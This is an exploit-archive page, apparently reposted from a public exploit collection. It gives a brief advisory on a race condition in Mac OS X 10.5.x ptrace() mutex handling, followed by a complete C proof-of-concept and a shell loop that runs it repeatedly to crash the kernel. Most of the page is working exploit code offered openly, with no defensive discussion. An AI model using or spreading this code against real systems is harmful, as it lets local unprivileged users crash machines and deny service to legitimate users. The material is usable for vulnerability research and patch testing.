
TheHackerWorld Official

Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service

// source: https://www.securityfocus.com/bid/36915/info

Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.

Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users. 

/*
  Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS 
  ==================================================
  This code should be run in a loop and due to problems 
  with mutex handling in ptrace a DoS can occur when a 
  destroyed mutex is attempted to be interlocked by OSX 
  kernel giving rise to a race condition. You may need
  to run this code multiple times.
  
  - Tested against 10.5.6
  - Tested against 10.5.7

  while `true`;do ./prdelka-vs-APPLE-ptracepanic;done

  This code is dedicated to a friend who I met in this
  place. Long live the exploit scene. R.I.P str0ke.

  -- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>   /* wait() */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* fork(), usleep(), execve() */


int main(){
	pid_t pid;
	char *argv[] = {"id","","",0};
	char *envp[] = {"",0};
	pid = fork();
	if(pid == 0){
		usleep(100);
		execve("/usr/bin/id",argv,envp);
	}
	else{
		usleep(820);
		if(ptrace(PT_ATTACH,pid,0,0)==0){
			printf("[ PID: %d has been caught!\n",pid);
			if(ptrace(PT_DETACH,pid,0,0)<0){
				perror("Evil happens.");
			}
			usleep(1);
			wait(0);
		}
		else{
			perror("Fail!");
		}
	}
	return(0);
}